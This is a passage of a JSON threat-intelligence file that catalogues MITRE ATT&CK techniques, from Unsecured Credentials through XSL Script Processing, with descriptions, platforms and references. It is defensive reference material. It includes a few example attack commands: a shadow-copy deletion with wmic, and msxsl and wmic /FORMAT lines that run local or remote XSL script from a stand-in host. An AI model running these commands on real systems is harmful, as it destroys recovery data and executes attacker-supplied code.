"description": "Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://app.tidalcyber.com/technique/065d1cca-8ca5-4f8b-a333-2340706f589e)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://app.tidalcyber.com/technique/cdac2469-52ca-42a8-aefe-0321a7e3d658)), or other specialized files/artifacts (e.g. [Private Keys](https://app.tidalcyber.com/technique/e493bf4a-0eba-4e60-a7a6-c699084dc98a)).<sup>[[Brining MimiKatz to Unix](https://app.tidalcyber.com/references/5ad06565-6694-4c42-81c9-880d66f6d07f)]</sup>",
"meta": {
"platforms": [
"Azure AD",
"Containers",
"Google Workspace",
"IaaS",
"Linux",
"macOS",
"Network",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "02ed857b-ba39-4fab-b1d9-3ed2aa689dfd",
"value": "Unsecured Credentials"
},
{
"description": "Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure.\n\nCloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected.\n\nA variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity.\n\nAn example of adversary use of unused AWS regions is to mine cryptocurrency through [Resource Hijacking](https://app.tidalcyber.com/technique/d10c4a15-aeaa-4630-a7a3-3373c89a584f), which can cost organizations substantial amounts of money over time depending on the processing power used.<sup>[[CloudSploit - Unused AWS Regions](https://app.tidalcyber.com/references/7c237b73-233f-4fe3-b4a6-ce523fd82853)]</sup>",
"meta": {
"platforms": [
"IaaS"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "edf9f7d7-bc14-4e25-800d-f508acb580d4",
"value": "Unused/Unsupported Cloud Regions"
},
{
"description": "Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls. \n\nAuthentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.<sup>[[NIST Authentication](https://app.tidalcyber.com/references/f3cfb9b9-62f4-4066-a2b9-7e6f25bd7a46)]</sup><sup>[[NIST MFA](https://app.tidalcyber.com/references/2f069bb2-3f59-409e-a337-7c69411c8b01)]</sup>\n\nCaching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication must be maintained by the system—either in memory or on disk—it may be at risk of being stolen through [Credential Access](https://app.tidalcyber.com/tactics/0c3132d5-c0df-4793-b5f2-1a95bd64ab53) techniques. By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors.\n",
"meta": {
"platforms": [
"Containers",
"Google Workspace",
"IaaS",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "28f65214-95c1-4a72-b385-0b32cbcaea8f",
"value": "Use Alternate Authentication Material"
},
{
"description": "An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533).\n\nWhile [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872) frequently occurs shortly after Initial Access, it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://app.tidalcyber.com/technique/4f4ea659-7653-4bfd-a525-b2af32c5899b).\n\nAdversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://app.tidalcyber.com/technique/acf828f4-7e7e-43e1-bf15-ceab42021430), allowing direct control of the system to the adversary; running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://app.tidalcyber.com/technique/17f9e46d-4e3d-4491-a0d9-0cc042531d6e)s; or downloading and executing malware for [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872).<sup>[[Talos Roblox Scam 2023](https://app.tidalcyber.com/references/9371ee4a-ac23-5acb-af3f-132ef3645392)]</sup><sup>[[Krebs Discord Bookmarks 2023](https://app.tidalcyber.com/references/1d0a21f4-9a8e-5514-894a-3d55263ff973)]</sup>\n\nFor example, tech support scams can be facilitated through [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://app.tidalcyber.com/technique/acf828f4-7e7e-43e1-bf15-ceab42021430).<sup>[[Telephone Attack Delivery](https://app.tidalcyber.com/references/9670da7b-0600-4072-9ecc-65a918b89ac5)]</sup>",
"meta": {
"platforms": [
"Containers",
"IaaS",
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
}
],
"uuid": "b84435ab-2ff4-4b6f-ba71-b4b815474872",
"value": "User Execution"
},
{
"description": "Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.<sup>[[volexity_0day_sophos_FW](https://app.tidalcyber.com/references/85bee18e-216d-4ea6-b34e-b071e3f63382)]</sup> Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.\n\nIn some cases, adversaries may abuse inactive accounts: for example, those belonging to individuals who are no longer part of an organization. Using these accounts may allow the adversary to evade detection, as the original account user will not be present to identify any anomalous activity taking place on their account.<sup>[[CISA MFA PrintNightmare](https://app.tidalcyber.com/references/fa03324e-c79c-422e-80f1-c270fd87d4e2)]</sup>\n\nThe overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.<sup>[[TechNet Credential Theft](https://app.tidalcyber.com/references/5c183c97-0ab2-4b75-8dbc-9db92a929ff4)]</sup>",
"meta": {
"platforms": [
"Azure AD",
"Containers",
"Google Workspace",
"IaaS",
"Linux",
"macOS",
"Network",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
"type": "uses"
}
],
"uuid": "a9b7eb2f-63e7-41bc-9d77-f7c4cede5406",
"value": "Valid Accounts"
},
{
"description": "An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.\n\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://app.tidalcyber.com/technique/4462ce9d-0a5a-427d-8160-7b307b50cfbd) due to use of specific devices or applications for video recording rather than capturing the victim's screen.\n\nIn macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. <sup>[[objective-see 2017 review](https://app.tidalcyber.com/references/26b757c8-25cd-42ef-bef2-eb7a28455d57)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "0c81e13a-3608-4171-8075-9f70b2934028",
"value": "Video Capture"
},
{
"description": "Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8) during automated discovery to shape follow-on behaviors.<sup>[[Deloitte Environment Awareness](https://app.tidalcyber.com/references/af842a1f-8f39-4b4f-b4d2-0bbb810e6c31)]</sup>\n\nAdversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8) such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.<sup>[[Unit 42 Pirpi July 2015](https://app.tidalcyber.com/references/42d35b93-2866-46d8-b8ff-675df05db9db)]</sup>\n\n",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8",
"value": "Virtualization/Sandbox Evasion"
},
{
"description": "Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. <sup>[[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)]</sup>\n\nEncryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.\n\nAdversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://app.tidalcyber.com/technique/f435a5ff-78d2-44de-b464-2b5528f94adc), [Reduce Key Space](https://app.tidalcyber.com/technique/aa6595d5-1b2e-45a8-8caf-b0968aeab2ba), and [Disable Crypto Hardware](https://app.tidalcyber.com/technique/f413afa2-406d-4e8e-a12c-5f1b8ef05d8a), an adversary can negatively affect and/or eliminate a device’s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. <sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup>",
"meta": {
"platforms": [
"Network"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "8cf19b3d-c9fa-4d71-a6ab-dc0e236e57d4",
"value": "Weaken Encryption"
},
{
"description": "Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "a729feee-8e21-444e-8eea-2ec595b09931",
"value": "Web Service"
},
{
"description": "Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.<sup>[[WMI 1-3](https://app.tidalcyber.com/references/fe0a3b0c-8526-5a0d-acb8-660bbc0c9328)]</sup> WMI is an administration feature that provides a uniform environment to access Windows system components.\n\nThe WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) such as [Distributed Component Object Model](https://app.tidalcyber.com/technique/ebc5fabb-5634-49f2-8979-94ea98da114a) and [Windows Remote Management](https://app.tidalcyber.com/technique/c2866fd3-754e-4b40-897a-e73a8c1fcf7b).<sup>[[WMI 1-3](https://app.tidalcyber.com/references/fe0a3b0c-8526-5a0d-acb8-660bbc0c9328)]</sup> Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.<sup>[[WMI 1-3](https://app.tidalcyber.com/references/fe0a3b0c-8526-5a0d-acb8-660bbc0c9328)]</sup> <sup>[[Mandiant WMI](https://app.tidalcyber.com/references/8d237948-7b10-5055-b9e6-52e6cab16f32)]</sup>\n\nAn adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for [Discovery](https://app.tidalcyber.com/tactics/ee7e5a85-a940-46e4-b408-12956f3baafa) as well as [Execution](https://app.tidalcyber.com/tactics/dad2337d-6d35-410a-acc5-da36ff83ee44) of commands and payloads.<sup>[[Mandiant WMI](https://app.tidalcyber.com/references/8d237948-7b10-5055-b9e6-52e6cab16f32)]</sup> For example, `wmic.exe` can be abused by an adversary to delete shadow copies with the command `wmic.exe Shadowcopy Delete` (i.e., [Inhibit System Recovery](https://app.tidalcyber.com/technique/d207c03b-fbe7-420e-a053-339f4650c043)).<sup>[[WMI 6](https://app.tidalcyber.com/references/df07a086-0d38-570b-b0c5-9f5061212db7)]</sup>\n\n**Note:** `wmic.exe` is deprecated as of January of 2024, with the WMIC feature being “disabled by default” on Windows 11+. WMIC will be removed from subsequent Windows releases and replaced by [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) as the primary WMI interface.<sup>[[WMI 7,8](https://app.tidalcyber.com/references/819cecb2-5bd3-5c20-bbda-372516b00d6e)]</sup> In addition to PowerShell and tools like `wbemtool.exe`, COM APIs can also be used to programmatically interact with WMI via C++, .NET, VBScript, etc.<sup>[[WMI 7,8](https://app.tidalcyber.com/references/819cecb2-5bd3-5c20-bbda-372516b00d6e)]</sup>",
"meta": {
"platforms": [
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
}
],
"uuid": "c37795d9-8970-461f-9491-3086d6b4b69a",
"value": "Windows Management Instrumentation"
},
{
"description": "Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. <sup>[[Microsoft XSLT Script Mar 2017](https://app.tidalcyber.com/references/7ff47640-2a98-4a55-939a-ab6c8c8d2d09)]</sup>\n\nAdversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://app.tidalcyber.com/technique/8811114c-a0cf-479c-b95d-c036467749e3), the Microsoft command line transformation utility binary (msxsl.exe) <sup>[[Microsoft msxsl.exe](https://app.tidalcyber.com/references/a25d664c-d109-466f-9b6a-7e9ea8c57895)]</sup> can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. <sup>[[Penetration Testing Lab MSXSL July 2017](https://app.tidalcyber.com/references/2f1adf20-a4b8-48c1-861f-0a44271765d7)]</sup> Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. <sup>[[Reaqta MSXSL Spearphishing MAR 2018](https://app.tidalcyber.com/references/927737c9-63a3-49a6-85dc-620e055aaf0a)]</sup> Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe, adversaries may also give the XML/XSL files an arbitrary file extension.<sup>[[XSL Bypass Mar 2019](https://app.tidalcyber.com/references/e4e2cf48-47e0-45d8-afc2-a35635f7e880)]</sup>\n\nCommand-line examples:<sup>[[Penetration Testing Lab MSXSL July 2017](https://app.tidalcyber.com/references/2f1adf20-a4b8-48c1-861f-0a44271765d7)]</sup><sup>[[XSL Bypass Mar 2019](https://app.tidalcyber.com/references/e4e2cf48-47e0-45d8-afc2-a35635f7e880)]</sup>\n\n* <code>msxsl.exe customers[.]xml script[.]xsl</code>\n* <code>msxsl.exe script[.]xsl script[.]xsl</code>\n* <code>msxsl.exe script[.]jpeg script[.]jpeg</code>\n\nAnother variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a) to invoke JScript or VBScript within an XSL file.<sup>[[LOLBAS Wmic](https://app.tidalcyber.com/references/497e73d4-9f27-4b30-ba09-f152ce866d0f)]</sup> This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://app.tidalcyber.com/technique/b1da2b02-9ade-45e0-a795-ec1b19e5316a)/ \"Squiblydoo\" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a) provided they utilize the /FORMAT switch.<sup>[[XSL Bypass Mar 2019](https://app.tidalcyber.com/references/e4e2cf48-47e0-45d8-afc2-a35635f7e880)]</sup>\n\nCommand-line examples:<sup>[[XSL Bypass Mar 2019](https://app.tidalcyber.com/references/e4e2cf48-47e0-45d8-afc2-a35635f7e880)]</sup><sup>[[LOLBAS Wmic](https://app.tidalcyber.com/references/497e73d4-9f27-4b30-ba09-f152ce866d0f)]</sup>\n\n* Local File: <code>wmic process list /FORMAT:evil[.]xsl</code>\n* Remote File: <code>wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”</code>",
"meta": {
"platforms": [
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "4eb755e6-41f1-4c92-b14d-87a61a446258",
"value": "XSL Script Processing"
}
],
"version": 1
}